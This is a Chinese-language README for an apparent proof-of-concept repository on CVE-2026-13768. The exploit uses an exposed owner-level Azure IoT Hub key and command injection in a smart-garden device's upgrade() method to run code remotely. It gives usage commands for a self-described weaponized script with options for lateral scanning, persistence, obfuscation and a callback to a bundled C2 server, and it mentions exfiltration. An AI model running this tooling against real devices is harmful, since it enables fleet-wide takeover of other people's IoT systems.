Azure IoT Hub 中,暴露所有者级别的共享访问密钥可导致对连接的 IoT 设备进行未经身份验证的远程代码执行(RCE)。概念验证。
[!WARNING] 此仓库包含一个高严重性物联网漏洞的完整概念验证。
本代码仅供教育用途、授权安全研究和防御性测试使用。未经授权使用是违法的。 未经所有者明确书面许可,测试或利用系统违反了《计算机欺诈与滥用法》(CFAA)、欧盟《网络弹性法案》以及您所在司法管辖区的其他适用法律。
作者对因本代码导致的任何误用、损害或法律后果不承担任何责任。
始终在法律和道德范围内进行操作。
CVE-2026-13768 暴露了 Gardyn 智能花园系统中 IoT Hub 的所有者级连接字符串,允许对 Azure IoT Hub 进行完全管理控制。此 PoC 演示了攻击者如何通过 upgrade() 云到设备方法中的命令注入,利用所有者密钥在连接的设备上实现远程代码执行 (RCE),从而能够对整个设备群进行破坏。
该套件包括:
这是一个持续进行的研究项目——请负责任地使用它,以理解和防御供应链及物联网云配置错误。
upgrade() 方法(利用 CVE-2025-29631 命令注入)注入命令.
├── poc.py # 主要的武器化利用脚本
├── validate.py # 安全的只读验证工具
├── c2s.py # 用于演示的轻量级 C2 服务器
├── TEMPLATES.md # 即用型命令模板。
├── README.md
克隆仓库:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
激活虚拟环境(或创建一个):
source venv/bin/activate
python3 -m pip install --upgrade pip
安装依赖:
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
退出码 0 = 有效的所有者密钥,且设备可访问。不进行任何修改。
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
| 参数 | 描述 | 必需 |
|---|---|---|
--mode | validate 或 exploit | 否(默认:validate) |
--conn-str | IoT Hub 所有者连接字符串 | 是 |
--device-id | 目标设备 ID | 是(exploit 模式) |
--command | 通过 upgrade() 注入执行的命令 | 否(默认:id) |
--lateral-scan | 启用从设备进行的局域网侦察 | 否 |
--persist | 尝试持久化(例如 cron、systemd) | 否 |
--c2 | 回连到 C2 服务器 | 否 |
运行 python poc.py --help 查看完整选项。
python c2s.py --port 4444
iothubowner 身份进行身份验证upgrade() 直接方法中的命令注入注意:横向移动和持久化代码为说明性占位符。请根据目标设备的操作系统和限制(例如 BusyBox 受限环境)进行调整。
/tmp/cve_2026_13768.log。在实际渗透中,请替换为加密外传。obfuscate_cmd() / deobfuscate_cmd() 函数。欢迎对以下方面做出贡献:
请提交 issue 或 PR。
能力越大,责任越大。